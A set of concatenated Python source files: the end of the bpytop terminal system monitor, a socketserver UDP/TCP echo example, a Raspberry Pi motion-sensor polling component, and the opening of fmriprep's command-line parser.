Collector.collect_idle.wait()
CONFIG.color_theme = list(Theme.themes)[color_i]
THEME(CONFIG.color_theme)
Term.refresh(force=True)
Timer.finish()
elif key in ["left", "right"] and selected == "proc_sorting":
ProcCollector.sorting(key)
elif key in ["left", "right"] and selected == "log_level":
if key == "left":
loglevel_i -= 1
if loglevel_i < 0: loglevel_i = len(CONFIG.log_levels) - 1
elif key == "right":
loglevel_i += 1
if loglevel_i > len(CONFIG.log_levels) - 1: loglevel_i = 0
CONFIG.log_level = CONFIG.log_levels[loglevel_i]
errlog.setLevel(getattr(logging, CONFIG.log_level))
errlog.info(f'Loglevel set to {CONFIG.log_level}')
elif key in ["left", "right"] and selected == "cpu_sensor" and len(CONFIG.cpu_sensors) > 1:
if key == "left":
cpu_sensor_i -= 1
if cpu_sensor_i < 0: cpu_sensor_i = len(CONFIG.cpu_sensors) - 1
elif key == "right":
cpu_sensor_i += 1
if cpu_sensor_i > len(CONFIG.cpu_sensors) - 1: cpu_sensor_i = 0
Collector.collect_idle.wait()
CpuCollector.sensor_swap = True
CONFIG.cpu_sensor = CONFIG.cpu_sensors[cpu_sensor_i]
if CONFIG.check_temp and (CpuCollector.sensor_method != "psutil" or CONFIG.cpu_sensor == "Auto"):
CpuCollector.get_sensors()
Term.refresh(force=True)
cls.resized = False
elif key in ["left", "right"] and selected == "view_mode":
if key == "left":
view_mode_i -= 1
if view_mode_i < 0: view_mode_i = len(CONFIG.view_modes) - 1
elif key == "right":
view_mode_i += 1
if view_mode_i > len(CONFIG.view_modes) - 1: view_mode_i = 0
CONFIG.view_mode = CONFIG.view_modes[view_mode_i]
Box.proc_mode = CONFIG.view_mode == "proc"
Box.stat_mode = CONFIG.view_mode == "stat"
if ARG_MODE:
ARG_MODE = ""
Draw.clear(saved=True)
Term.refresh(force=True)
cls.resized = False
elif key == "up":
selected_int -= 1
if selected_int < 0: selected_int = len(option_items) - 1
page = floor(selected_int * 2 / h) + 1
elif key == "down":
selected_int += 1
if selected_int > len(option_items) - 1: selected_int = 0
page = floor(selected_int * 2 / h) + 1
elif key in ["mouse_scroll_up", "page_up"] and pages:
page -= 1
if page < 1: page = pages
selected_int = (page-1) * ceil(h / 2)
elif key in ["mouse_scroll_down", "page_down"] and pages:
page += 1
if page > pages: page = 1
selected_int = (page-1) * ceil(h / 2)
elif has_sel:
pass
else:
redraw = False
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(2)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
if main_active:
cls.close = False
return
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
class Timer:
timestamp: float
return_zero = False
@classmethod
def stamp(cls):
cls.timestamp = time()
@classmethod
def not_zero(cls) -> bool:
if cls.return_zero:
cls.return_zero = False
return False
return cls.timestamp + (CONFIG.update_ms / 1000) > time()
@classmethod
def left(cls) -> float:
return cls.timestamp + (CONFIG.update_ms / 1000) - time()
@classmethod
def finish(cls):
cls.return_zero = True
cls.timestamp = time() - (CONFIG.update_ms / 1000)
Key.break_wait()
class UpdateChecker:
version: str = VERSION
thread: threading.Thread
@classmethod
def run(cls):
cls.thread = threading.Thread(target=cls._checker)
cls.thread.start()
@classmethod
def _checker(cls):
try:
with urllib.request.urlopen("https://github.com/aristocratos/bpytop/raw/master/bpytop.py", timeout=5) as source: # type: ignore
for line in source:
line = line.decode("utf-8")
if line.startswith("VERSION: str ="):
cls.version = line[(line.index("=")+1):].strip('" \n')
break
except Exception as e:
errlog.exception(f'{e}')
else:
if cls.version != VERSION and which("notify-send"):
try:
subprocess.run(["notify-send", "-u", "normal", "BpyTop Update!",
f'New version of BpyTop available!\nCurrent version: {VERSION}\nNew version: {cls.version}\nDownload at github.com/aristocratos/bpytop',
"-i", "update-notifier", "-t", "10000"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
except Exception as e:
errlog.exception(f'{e}')
class Init:
running: bool = True
initbg_colors: List[str] = []
initbg_data: List[int]
initbg_up: Graph
initbg_down: Graph
resized = False
@classmethod
def start(cls):
Draw.buffer("init", z=1)
Draw.buffer("initbg", z=10)
for i in range(51):
for _ in range(2): cls.initbg_colors.append(Color.fg(i, i, i))
Draw.buffer("banner", (f'{Banner.draw(Term.height // 2 - 10, center=True)}{Mv.d(1)}{Mv.l(11)}{Colors.black_bg}{Colors.default}'
f'{Fx.b}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}{Color.fg("#50")}'), z=2)
for _i in range(7):
perc = f'{str(round((_i + 1) * 14 + 2)) + "%":>5}'
Draw.buffer("+banner", f'{Mv.to(Term.height // 2 - 2 + _i, Term.width // 2 - 28)}{Fx.trans(perc)}{Symbol.v_line}')
Draw.out("banner")
Draw.buffer("+init!", f'{Color.fg("#cc")}{Fx.b}{Mv.to(Term.height // 2 - 2, Term.width // 2 - 21)}{Mv.save}')
cls.initbg_data = [randint(0, 100) for _ in range(Term.width * 2)]
cls.initbg_up = Graph(Term.width, Term.height // 2, cls.initbg_colors, cls.initbg_data, invert=True)
cls.initbg_down = Graph(Term.width, Term.height // 2, cls.initbg_colors, cls.initbg_data, invert=False)
@classmethod
def success(cls):
if not CONFIG.show_init or cls.resized: return
cls.draw_bg(5)
Draw.buffer("+init!", f'{Mv.restore}{Symbol.ok}\n{Mv.r(Term.width // 2 - 22)}{Mv.save}')
@staticmethod
def fail(err):
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Symbol.fail}')
sleep(2)
errlog.exception(f'{err}')
clean_quit(1, errmsg=f'Error during init! See {CONFIG_DIR}/error.log for more information.')
@classmethod
def draw_bg(cls, times: int = 5):
for _ in range(times):
sleep(0.05)
x = randint(0, 100)
Draw.buffer("initbg", f'{Fx.ub}{Mv.to(0, 0)}{cls.initbg_up(x)}{Mv.to(Term.height // 2, 0)}{cls.initbg_down(x)}')
Draw.out("initbg", "banner", "init")
@classmethod
def done(cls):
cls.running = False
if not CONFIG.show_init: return
if cls.resized:
Draw.now(Term.clear)
else:
cls.draw_bg(10)
Draw.clear("initbg", "banner", "init", saved=True)
if cls.resized: return
del cls.initbg_up, cls.initbg_down, cls.initbg_data, cls.initbg_colors
#? Functions ------------------------------------------------------------------------------------->
def get_cpu_name() -> str:
'''Fetch a suitable CPU identifier from the CPU model name string'''
name: str = ""
nlist: List = []
command: str = ""
cmd_out: str = ""
rem_line: str = ""
if SYSTEM == "Linux":
command = "cat /proc/cpuinfo"
rem_line = "model name"
elif SYSTEM == "MacOS":
command ="sysctl -n machdep.cpu.brand_string"
elif SYSTEM == "BSD":
command ="sysctl hw.model"
rem_line = "hw.model"
try:
cmd_out = subprocess.check_output("LANG=C " + command, shell=True, universal_newlines=True)
except:
pass
if rem_line:
for line in cmd_out.split("\n"):
if rem_line in line:
name = re.sub( ".*" + rem_line + ".*:", "", line,1).lstrip()
else:
name = cmd_out
nlist = name.split(" ")
try:
if "Xeon" in name and "CPU" in name:
name = nlist[nlist.index("CPU")+(-1 if name.endswith(("CPU", "z")) else 1)]
elif "Ryzen" in name:
name = " ".join(nlist[nlist.index("Ryzen"):nlist.index("Ryzen")+3])
elif "Duo" in name and "@" in name:
name = " ".join(nlist[:nlist.index("@")])
elif "CPU" in name and not nlist[0] == "CPU" and not nlist[nlist.index("CPU")-1].isdigit():
name = nlist[nlist.index("CPU")-1]
except:
pass
name = name.replace("Processor", "").replace("CPU", "").replace("(R)", "").replace("(TM)", "").replace("Intel", "")
name = re.sub(r"\d?\.?\d+[mMgG][hH][zZ]", "", name)
name = " ".join(name.split())
return name
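# Illustrative only (not executed anywhere): with the trimming rules above, a model string
# such as "Intel(R) Core(TM) i7-8550U CPU @ 1.80GHz" reduces to "i7-8550U" and
# "AMD Ryzen 7 3700X 8-Core Processor" reduces to "Ryzen 7 3700X"; the exact result
# depends on the model string the system reports.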
def get_cpu_core_mapping() -> List[int]:
mapping: List[int] = []
if SYSTEM == "Linux" and os.path.isfile("/proc/cpuinfo"):
try:
mapping = [0] * THREADS
num = 0
with open("/proc/cpuinfo", "r") as f:
for line in f:
if line.startswith("processor"):
num = int(line.strip()[(line.index(": ")+2):])
if num > THREADS - 1:
break
elif line.startswith("core id"):
mapping[num] = int(line.strip()[(line.index(": ")+2):])
if num < THREADS - 1:
raise Exception
except:
mapping = []
if not mapping:
mapping = []
for _ in range(THREADS // CORES):
mapping.extend([x for x in range(CORES)])
return mapping
def create_box(x: int = 0, y: int = 0, width: int = 0, height: int = 0, title: str = "", title2: str = "", line_color: Color = None, title_color: Color = None, fill: bool = True, box = None) -> str:
'''Create a box from a box object or by given arguments'''
out: str = f'{Term.fg}{Term.bg}'
if not line_color: line_color = THEME.div_line
if not title_color: title_color = THEME.title
#* Get values from box class if given
if box:
x = box.x
y = box.y
width = box.width
height = box.height
title = box.name
hlines: Tuple[int, int] = (y, y + height - 1)
out += f'{line_color}'
#* Draw all horizontal lines
for hpos in hlines:
out += f'{Mv.to(hpos, x)}{Symbol.h_line * (width - 1)}'
#* Draw all vertical lines and fill if enabled
for hpos in range(hlines[0]+1, hlines[1]):
out += f'{Mv.to(hpos, x)}{Symbol.v_line}{" " * (width-2) if fill else Mv.r(width-2)}{Symbol.v_line}'
#* Draw corners
out += f'{Mv.to(y, x)}{Symbol.left_up}\
{Mv.to(y, x + width - 1)}{Symbol.right_up}\
{Mv.to(y + height - 1, x)}{Symbol.left_down}\
{Mv.to(y + height - 1, x + width - 1)}{Symbol.right_down}'
#* Draw titles if enabled
if title:
out += f'{Mv.to(y, x + 2)}{Symbol.title_left}{title_color}{Fx.b}{title}{Fx.ub}{line_color}{Symbol.title_right}'
if title2:
out += f'{Mv.to(hlines[1], x + 2)}{Symbol.title_left}{title_color}{Fx.b}{title2}{Fx.ub}{line_color}{Symbol.title_right}'
return f'{out}{Term.fg}{Mv.to(y + 1, x + 1)}'
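# Usage sketch (illustrative, the buffer name is a placeholder): the returned string is plain
# terminal escape codes and can be handed to the Draw buffer like any other output, e.g.
#   Draw.buffer("example_box", create_box(x=2, y=2, width=40, height=10, title="example"))
# The trailing Mv.to() leaves the cursor on the first cell inside the box, ready for content.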
def now_sleeping(signum, frame):
"""Reset terminal settings and stop background input read before putting to sleep"""
Key.stop()
Collector.stop()
Draw.now(Term.clear, Term.normal_screen, Term.show_cursor, Term.mouse_off, Term.mouse_direct_off, Term.title())
Term.echo(True)
os.kill(os.getpid(), signal.SIGSTOP)
def now_awake(signum, frame):
"""Set terminal settings and restart background input read"""
Draw.now(Term.alt_screen, Term.clear, Term.hide_cursor, Term.mouse_on, Term.title("BpyTOP"))
Term.echo(False)
Key.start()
Term.refresh()
Box.calc_sizes()
Box.draw_bg()
Collector.start()
def quit_sigint(signum, frame):
"""SIGINT redirection to clean_quit()"""
clean_quit()
def clean_quit(errcode: int = 0, errmsg: str = "", thread: bool = False):
"""Stop background input read, save current config and reset terminal settings before quitting"""
global THREAD_ERROR
if thread:
THREAD_ERROR = errcode
interrupt_main()
return
if THREAD_ERROR: errcode = THREAD_ERROR
Key.stop()
Collector.stop()
if not errcode: CONFIG.save_config()
Draw.now(Term.clear, Term.normal_screen, Term.show_cursor, Term.mouse_off, Term.mouse_direct_off, Term.title())
Term.echo(True)
if errcode == 0:
errlog.info(f'Exiting. Runtime {timedelta(seconds=round(time() - SELF_START, 0))} \n')
else:
errlog.warning(f'Exiting with errorcode ({errcode}). Runtime {timedelta(seconds=round(time() - SELF_START, 0))} \n')
if not errmsg: errmsg = f'Bpytop exited with errorcode ({errcode}). See {CONFIG_DIR}/error.log for more information!'
if errmsg: print(errmsg)
raise SystemExit(errcode)
def floating_humanizer(value: Union[float, int], bit: bool = False, per_second: bool = False, start: int = 0, short: bool = False) -> str:
'''Scales up in steps of 1024 to highest possible unit and returns string with unit suffixed
* bit=True for bit units, otherwise defaults to bytes
* start=int to set 1024 multiplier starting unit
* short=True always returns 0 decimals and shortens unit to 1 character
'''
out: str = ""
mult: int = 8 if bit else 1
selector: int = start
unit: Tuple[str, ...] = UNITS["bit"] if bit else UNITS["byte"]
if isinstance(value, float): value = round(value * 100 * mult)
elif value > 0: value *= 100 * mult
else: value = 0
while len(f'{value}') > 5 and value >= 102400:
value >>= 10
if value < 100:
out = f'{value}'
break
selector += 1
else:
if len(f'{value}') == 4 and selector > 0:
out = f'{value}'[:-2] + "." + f'{value}'[-2]
elif len(f'{value}') == 3 and selector > 0:
out = f'{value}'[:-2] + "." + f'{value}'[-2:]
elif len(f'{value}') >= 2:
out = f'{value}'[:-2]
else:
out = f'{value}'
if short:
if "." in out:
out = f'{round(float(out))}'
if len(out) > 3:
out = f'{int(out[0]) + 1}'
selector += 1
out += f'{"" if short else " "}{unit[selector][0] if short else unit[selector]}'
if per_second: out += "ps" if bit else "/s"
return out
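# Expected behaviour, illustrative only and assuming UNITS["byte"] starts with
# ("Byte", "KiB", "MiB", ...) as defined earlier in this file:
#   floating_humanizer(1024)                      -> "1.00 KiB"
#   floating_humanizer(10 << 20, per_second=True) -> "10.0 MiB/s"
#   floating_humanizer(10 << 20, short=True)      -> "10M"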
def units_to_bytes(value: str) -> int:
if not value: return 0
out: int = 0
mult: int = 0
bit: bool = False
value_i: int = 0
units: Dict[str, int] = {"k" : 1, "m" : 2, "g" : 3}
try:
if value.lower().endswith("s"):
value = value[:-1]
if value.lower().endswith("bit"):
bit = True
value = value[:-3]
elif value.lower().endswith("byte"):
value = value[:-4]
if value[-1].lower() in units:
mult = units[value[-1].lower()]
value = value[:-1]
if "." in value and value.replace(".", "").isdigit():
if mult > 0:
value_i = round(float(value) * 1024)
mult -= 1
else:
value_i = round(float(value))
elif value.isdigit():
value_i = int(value)
if bit: value_i = round(value_i / 8)
out = int(value_i) << (10 * mult)
except ValueError:
out = 0
return out
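# Expected behaviour, illustrative only: units_to_bytes("10M") -> 10 << 20 == 10485760,
# units_to_bytes("10Mbit") -> round(10 / 8) << 20 == 1048576, units_to_bytes("512") -> 512;
# empty or unparsable strings fall through to 0.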
def min_max(value: int, min_value: int=0, max_value: int=100) -> int:
return max(min_value, min(value, max_value))
def readfile(file: str, default: str = "") -> str:
out: Union[str, None] = None
if os.path.isfile(file):
try:
with open(file, "r") as f:
out = f.read().strip()
except:
pass
return default if out is None else out
def process_keys():
mouse_pos: Tuple[int, int] = (0, 0)
filtered: bool = False
global ARG_MODE
while Key.has_key():
key = Key.get()
if key in ["mouse_scroll_up", "mouse_scroll_down", "mouse_click"]:
mouse_pos = Key.get_mouse()
if mouse_pos[0] >= ProcBox.x and ProcBox.current_y + 1 <= mouse_pos[1] < ProcBox.current_y + ProcBox.current_h - 1:
pass
elif key == "mouse_click":
key = "mouse_unselect"
else:
key = "_null"
if ProcBox.filtering:
if key in ["enter", "mouse_click", "mouse_unselect"]:
ProcBox.filtering = False
Collector.collect(ProcCollector, redraw=True, only_draw=True)
continue
elif key in ["escape", "delete"]:
ProcCollector.search_filter = ""
ProcBox.filtering = False
elif len(key) == 1:
ProcCollector.search_filter += key
elif key == "backspace" and len(ProcCollector.search_filter) > 0:
ProcCollector.search_filter = ProcCollector.search_filter[:-1]
else:
continue
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
if filtered: Collector.collect_done.wait(0.1)
filtered = True
continue
if key == "_null":
continue
elif key == "q":
clean_quit()
elif key == "+" and CONFIG.update_ms + 100 <= 86399900:
CONFIG.update_ms += 100
Box.draw_update_ms()
elif key == "-" and CONFIG.update_ms - 100 >= 100:
CONFIG.update_ms -= 100
Box.draw_update_ms()
elif key in ["b", "n"]:
NetCollector.switch(key)
elif key in ["M", "escape"]:
Menu.main()
elif key in ["o", "f2"]:
Menu.options()
elif key in ["h", "f1"]:
Menu.help()
elif key == "z":
NetCollector.reset = not NetCollector.reset
Collector.collect(NetCollector, redraw=True)
elif key == "y":
CONFIG.net_sync = not CONFIG.net_sync
Collector.collect(NetCollector, redraw=True)
elif key == "a":
NetCollector.auto_min = not NetCollector.auto_min
NetCollector.net_min = {"download" : -1, "upload" : -1}
Collector.collect(NetCollector, redraw=True)
elif key in ["left", "right"]:
ProcCollector.sorting(key)
elif key == " " and CONFIG.proc_tree and ProcBox.selected > 0:
if ProcBox.selected_pid in ProcCollector.collapsed:
ProcCollector.collapsed[ProcBox.selected_pid] = not ProcCollector.collapsed[ProcBox.selected_pid]
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "e":
CONFIG.proc_tree = not CONFIG.proc_tree
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "r":
CONFIG.proc_reversed = not CONFIG.proc_reversed
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "c":
CONFIG.proc_per_core = not CONFIG.proc_per_core
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "g":
CONFIG.mem_graphs = not CONFIG.mem_graphs
Collector.collect(MemCollector, interrupt=True, redraw=True)
elif key == "s":
Collector.collect_idle.wait()
CONFIG.swap_disk = not CONFIG.swap_disk
Collector.collect(MemCollector, interrupt=True, redraw=True)
elif key == "f":
ProcBox.filtering = True
if not ProcCollector.search_filter: ProcBox.start = 0
Collector.collect(ProcCollector, redraw=True, only_draw=True)
elif key == "m":
if ARG_MODE:
ARG_MODE = ""
elif CONFIG.view_modes.index(CONFIG.view_mode) + 1 > len(CONFIG.view_modes) - 1:
CONFIG.view_mode = CONFIG.view_modes[0]
else:
CONFIG.view_mode = CONFIG.view_modes[(CONFIG.view_modes.index(CONFIG.view_mode) + 1)]
Box.proc_mode = CONFIG.view_mode == "proc"
Box.stat_mode = CONFIG.view_mode == "stat"
Draw.clear(saved=True)
Term.refresh(force=True)
elif key.lower() in ["t", "k", "i"] and (ProcBox.selected > 0 or ProcCollector.detailed):
pid: int = ProcBox.selected_pid if ProcBox.selected > 0 else ProcCollector.detailed_pid # type: ignore
if psutil.pid_exists(pid):
if key.lower() == "t": sig = signal.SIGTERM
elif key.lower() == "k": sig = signal.SIGKILL
elif key.lower() == "i": sig = signal.SIGINT
try:
os.kill(pid, sig)
except Exception as e:
errlog.error(f'Exception when sending signal {sig} to pid {pid}')
errlog.exception(f'{e}')
elif key == "delete" and ProcCollector.search_filter:
ProcCollector.search_filter = ""
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
elif key == "enter":
if ProcBox.selected > 0 and ProcCollector.detailed_pid != ProcBox.selected_pid and psutil.pid_exists(ProcBox.selected_pid):
ProcCollector.detailed = True
ProcBox.last_selection = ProcBox.selected
ProcBox.selected = 0
ProcCollector.detailed_pid = ProcBox.selected_pid
ProcBox.resized = True
elif ProcCollector.detailed:
ProcBox.selected = ProcBox.last_selection
ProcBox.last_selection = 0
ProcCollector.detailed = False
ProcCollector.detailed_pid = None
ProcBox.resized = True
else:
continue
ProcCollector.details = {}
ProcCollector.details_cpu = []
ProcCollector.details_mem = []
Graphs.detailed_cpu = NotImplemented
Graphs.detailed_mem = NotImplemented
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
elif key in ["up", "down", "mouse_scroll_up", "mouse_scroll_down", "page_up", "page_down", "home", "end", "mouse_click", "mouse_unselect"]:
ProcBox.selector(key, mouse_pos)
#? Pre main -------------------------------------------------------------------------------------->
CPU_NAME: str = get_cpu_name()
CORE_MAP: List[int] = get_cpu_core_mapping()
THEME: Theme
def main():
global THEME
Term.width = os.get_terminal_size().columns
Term.height = os.get_terminal_size().lines
#? Init -------------------------------------------------------------------------------------->
if DEBUG: TimeIt.start("Init")
#? Switch to alternate screen, clear screen, hide cursor, enable mouse reporting and disable input echo
Draw.now(Term.alt_screen, Term.clear, Term.hide_cursor, Term.mouse_on, Term.title("BpyTOP"))
Term.echo(False)
Term.refresh(force=True)
#? Start a thread checking for updates while running init
if CONFIG.update_check: UpdateChecker.run()
#? Draw banner and init status
if CONFIG.show_init and not Init.resized:
Init.start()
#? Load theme
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Loading theme and creating colors... ")}{Mv.save}')
try:
THEME = Theme(CONFIG.color_theme)
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Setup boxes
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Doing some maths and drawing... ")}{Mv.save}')
try:
if CONFIG.check_temp: CpuCollector.get_sensors()
Box.calc_sizes()
Box.draw_bg(now=False)
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Setup signal handlers for SIGSTP, SIGCONT, SIGINT and SIGWINCH
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Setting up signal handlers... ")}{Mv.save}')
try:
signal.signal(signal.SIGTSTP, now_sleeping) #* Ctrl-Z
signal.signal(signal.SIGCONT, now_awake) #* Resume
signal.signal(signal.SIGINT, quit_sigint) #* Ctrl-C
signal.signal(signal.SIGWINCH, Term.refresh) #* Terminal resized
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Start a separate thread for reading keyboard input
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Starting input reader thread... ")}{Mv.save}')
try:
Key.start()
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Start a separate thread for data collection and drawing
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Starting data collection and drawer thread... ")}{Mv.save}')
try:
Collector.start()
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Collect data and draw to buffer
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Collecting data and drawing... ")}{Mv.save}')
try:
Collector.collect(draw_now=False)
pass
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Draw to screen
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Finishing up... ")}{Mv.save}')
try:
Collector.collect_done.wait()
except Exception as e:
Init.fail(e)
else:
Init.success()
Init.done()
Term.refresh()
Draw.out(clear=True)
if CONFIG.draw_clock:
Box.clock_on = True
if DEBUG: TimeIt.stop("Init")
#? Main loop ------------------------------------------------------------------------------------->
def run():
while not False:
Term.refresh()
Timer.stamp()
while Timer.not_zero():
if Key.input_wait(Timer.left()):
process_keys()
Collector.collect()
#? Start main loop
try:
run()
except Exception as e:
errlog.exception(f'{e}')
clean_quit(1)
else:
#? Quit cleanly even if false starts being true...
clean_quit()
if __name__ == "__main__":
main()
|
udpserverex2.py
|
import socketserver
from multiprocessing import Process, Pool
class MyTCPHandler(socketserver.BaseRequestHandler):
"""
The request handler class for our server.
It is instantiated once per connection to the server, and must
override the handle() method to implement communication to the
client.
"""
def handle(self):
# self.request is the TCP socket connected to the client
self.data = self.request.recv(1024).strip()
print("{} wrote:".format(self.client_address[0]))
print(self.data)
# just send back the same data, but upper-cased
self.request.sendall(self.data.upper())
class MyUDPHandler(socketserver.BaseRequestHandler):
"""
This class works similar to the TCP handler class, except that
self.request consists of a pair of data and client socket, and since
there is no connection the client address must be given explicitly
when sending data back via sendto().
"""
def handle(self):
data = self.request[0].strip()
socket = self.request[1]
print("{} wrote:".format(self.client_address[0]))
print(data)
socket.sendto(data.lower(), self.client_address)
def tcp_task():
server = socketserver.TCPServer(('0.0.0.0', 8888), MyTCPHandler)
try:
print('start tcp server')
server.serve_forever()
except Exception as e:
print(e)
def udp_task():
server = socketserver.UDPServer(('0.0.0.0', 8888), MyUDPHandler)
try:
server.serve_forever()
except Exception as e:
print(e)
if __name__ == "__main__":
HOST, PORT = "localhost", 8888
# p1 = Process(target=udp_task)
# p1.start()
# p1.join()
# p = Process(target=tcp_task)
# p.start()
# p.join()
# p = Pool(4)
# for i in range(4):
# p.apply_async(httpd_task)
# p.close()
# p.join()
# Create the server, binding to localhost on port 8888
with socketserver.UDPServer((HOST, PORT), MyUDPHandler) as server:
print('start udp server')
server.serve_forever()
# with socketserver.TCPServer((HOST, PORT), MyTCPHandler) as server1:
# server1.serve_forever()
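# Illustrative client sketch (not part of this script): the UDP handler above echoes the
# payload back lower-cased, so it can be exercised from another process roughly like this:
#
#   import socket
#   sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#   sock.sendto(b"Hello UDP", ("localhost", 8888))
#   reply, _addr = sock.recvfrom(1024)
#   print(reply)  # b'hello udp'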
|
motion_sensor_component.py
|
"""This module contains the MotionSensorComponent type."""
import threading
from datetime import datetime
from raspy.invalid_operation_exception import InvalidOperationException
from raspy.object_disposed_exception import ObjectDisposedException
from raspy.components.sensors.motion_sensor import MotionSensor
from raspy.components.sensors.motion_detected_event import MotionDetectedEvent
from raspy.io import pin_mode
from raspy.io import pin_state
from raspy.pi_system import core_utils
MOTION_DETECTED = pin_state.HIGH
"""The pin state to consider motion detected."""
class MotionSensorComponent(MotionSensor):
"""A component that is an abstraction of a motion sensor device."""
def __init__(self, pin):
"""Initialize a new instance of MotionSensorComponet.
:param raspy.io.gpio.Gpio pin: The input pin to check for motion on.
:raises: ArgumentNullException if pin is None.
"""
MotionSensor.__init__(self, pin)
self.__isPolling = False
self.__lastCheckDetected = False
self.__stopEvent = threading.Event()
self.__stopEvent.set()
self.__pollThread = None
@property
def is_polling(self):
"""Check to see if this instance is currently polling.
:returns: True if polling; Otherwise, False.
:rtype: bool
"""
return self.__isPolling
@property
def is_motion_detected(self):
"""Check to see if motion was detected.
:returns: True if motion was detected.
:rtype: bool
"""
return self.pin.state == MOTION_DETECTED
def interrupt_poll(self):
"""Interrupt the poll cycle."""
if not self.__isPolling or self.is_disposed:
return
if self.__stopEvent.is_set() or self.__pollThread is None:
return
self.__stopEvent.set()
self.__isPolling = False
def dispose(self):
"""Release managed resources used by this component."""
if self.is_disposed:
return
self.interrupt_poll()
MotionSensor.dispose(self)
def _execute_poll(self):
"""Execute the poll cycle."""
while not self.__stopEvent.is_set():
detected = self.is_motion_detected
if detected != self.__lastCheckDetected:
self.__lastCheckDetected = detected
now = datetime.now()
evt = MotionDetectedEvent(self.__lastCheckDetected, now)
self.on_motion_state_changed(evt)
core_utils.sleep(500)
def poll(self):
"""Poll the input pin status every 500ms until stopped.
:raises: raspy.object_disposed_exception.ObjectDisposedException if
this instance has been disposed.
:raises: raspy.invalid_operation_exception.InvalidOperationException
if the underlying pin is not an input pin.
"""
if self.is_disposed:
raise ObjectDisposedException("MotionSensorComponent")
if self.pin.mode != pin_mode.IN:
msg = "The specified pin is not configured as an input pin, which"
msg += " is required to read sensor data."
raise InvalidOperationException(msg)
self.__stopEvent.clear()
self.__isPolling = True
self.__pollThread = threading.Thread(target=self._execute_poll)
self.__pollThread.name = "MotionSensorComponentPollThread"
self.__pollThread.daemon = True
self.__pollThread.start()
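# Usage sketch (illustrative; the pin object and how handlers are attached depend on the
# rest of the raspy package and are assumptions, not part of this module):
#
#   sensor = MotionSensorComponent(some_input_pin)  # a raspy.io GPIO pin in pin_mode.IN
#   sensor.poll()             # start the 500 ms background poll thread
#   ...                       # on_motion_state_changed() fires on every state change
#   sensor.interrupt_poll()   # stop polling
#   sensor.dispose()          # release the component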
|
run.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
fMRI preprocessing workflow
===========================
"""
import os
import os.path as op
from pathlib import Path
import logging
import sys
import gc
import re
import uuid
import json
import tempfile
import psutil
import warnings
import subprocess
from argparse import ArgumentParser
from argparse import RawTextHelpFormatter
from multiprocessing import cpu_count
from time import strftime
from glob import glob
logging.addLevelName(25, 'IMPORTANT') # Add a new level between INFO and WARNING
logging.addLevelName(15, 'VERBOSE') # Add a new level between INFO and DEBUG
logger = logging.getLogger('cli')
def _warn_redirect(message, category, filename, lineno, file=None, line=None):
logger.warning('Captured warning (%s): %s', category, message)
def check_deps(workflow):
from nipype.utils.filemanip import which
return sorted(
(node.interface.__class__.__name__, node.interface._cmd)
for node in workflow._get_all_nodes()
if (hasattr(node.interface, '_cmd') and
which(node.interface._cmd.split()[0]) is None))
def get_parser():
"""Build parser object"""
from ..__about__ import __version__
verstr = 'fmriprep v{}'.format(__version__)
parser = ArgumentParser(description='FMRIPREP: fMRI PREProcessing workflows',
formatter_class=RawTextHelpFormatter)
# Arguments as specified by BIDS-Apps
# required, positional arguments
# IMPORTANT: they must go directly with the parser object
parser.add_argument('bids_dir', action='store',
help='the root folder of a BIDS valid dataset (sub-XXXXX folders should '
'be found at the top level in this folder).')
parser.add_argument('output_dir', action='store',
help='the output path for the outcomes of preprocessing and visual '
'reports')
parser.add_argument('analysis_level', choices=['participant'],
help='processing stage to be run, only "participant" in the case of '
'FMRIPREP (see BIDS-Apps specification).')
# optional arguments
parser.add_argument('--version', action='version', version=verstr)
g_bids = parser.add_argument_group('Options for filtering BIDS queries')
g_bids.add_argument('--skip_bids_validation', '--skip-bids-validation', action='store_true',
default=False,
help='assume the input dataset is BIDS compliant and skip the validation')
g_bids.add_argument('--participant_label', '--participant-label', action='store', nargs='+',
help='a space delimited list of participant identifiers or a single '
'identifier (the sub- prefix can be removed)')
# Re-enable when option is actually implemented
# g_bids.add_argument('-s', '--session-id', action='store', default='single_session',
# help='select a specific session to be processed')
# Re-enable when option is actually implemented
# g_bids.add_argument('-r', '--run-id', action='store', default='single_run',
# help='select a specific run to be processed')
g_bids.add_argument('-t', '--task-id', action='store',
help='select a specific task to be processed')
g_bids.add_argument('--echo-idx', action='store', type=int,
help='select a specific echo to be processed in a multiecho series')
g_perfm = parser.add_argument_group('Options to handle performance')
g_perfm.add_argument('--nthreads', '--n_cpus', '-n-cpus', action='store', type=int,
help='maximum number of threads across all processes')
g_perfm.add_argument('--omp-nthreads', action='store', type=int, default=0,
help='maximum number of threads per-process')
g_perfm.add_argument('--mem_mb', '--mem-mb', action='store', default=0, type=int,
help='upper bound memory limit for FMRIPREP processes')
